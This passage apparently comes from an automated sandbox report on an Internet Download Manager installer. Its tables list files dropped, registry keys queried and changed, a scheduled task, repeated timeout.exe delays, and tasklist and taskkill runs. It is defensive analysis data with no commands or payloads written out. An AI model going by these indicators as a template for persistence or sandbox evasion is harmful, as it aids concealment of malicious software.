| File created | C:\Program Files (x86)\Internet Download Manager\Languages\tips_vn.txt | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_az.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_hi.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_ba.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\template.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\IEGetVL2.htm | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Toolbar\3d_large_3_hdpi15.bmp | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_gr.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\IDMOpExt.nex | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\IDMEdgeExt.crx | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\tips_de.txt | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Toolbar\3d_smallHot_3.bmp | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_lao.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_pt.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_vn.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\IDMFType64.dll | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_cht.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_es.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_pt.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_cht.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\idmcchandler2.dll | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_src.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_ptbr.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_hu.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_id.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_ro.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_nl.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\tips_fr.txt | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_ru.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\tips_th.txt | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\RUNDLL32.EXE | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\RUNDLL32.EXE | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\RUNDLL32.EXE | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\RUNDLL32.EXE | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\runonce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\runonce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\runonce.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\SysWOW64\reg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\runonce.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\runonce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\reg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\runonce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\runonce.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\runonce.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\reg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | C:\Windows\SysWOW64\reg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\reg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\System32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppName = "IDMan.exe" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\Policy = "3" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\MenuExt\Download with IDM\ = "C:\\Program Files (x86)\\Internet Download Manager\\IEExt.htm" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\DragDrop\{F6E1B27E-F2DA-4919-9DBD-CAB90A1D662B}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\MenuExt\Download with IDM | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B851AF-A4B9-43EF-97D3-28E1B4A5DB9B}\AppName = "idmBroker.exe" | C:\Program Files (x86)\Internet Download Manager\idmBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\Policy = "3" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppName = "IEMonitor.exe" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006} | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4} | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppName = "IEMonitor.exe" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4} | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A} | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\DragDrop\{F6E1B27E-F2DA-4919-9DBD-CAB90A1D662B}\AppName = "IDMan.exe" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\AppName = "IDMan.exe" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A} | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4} | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
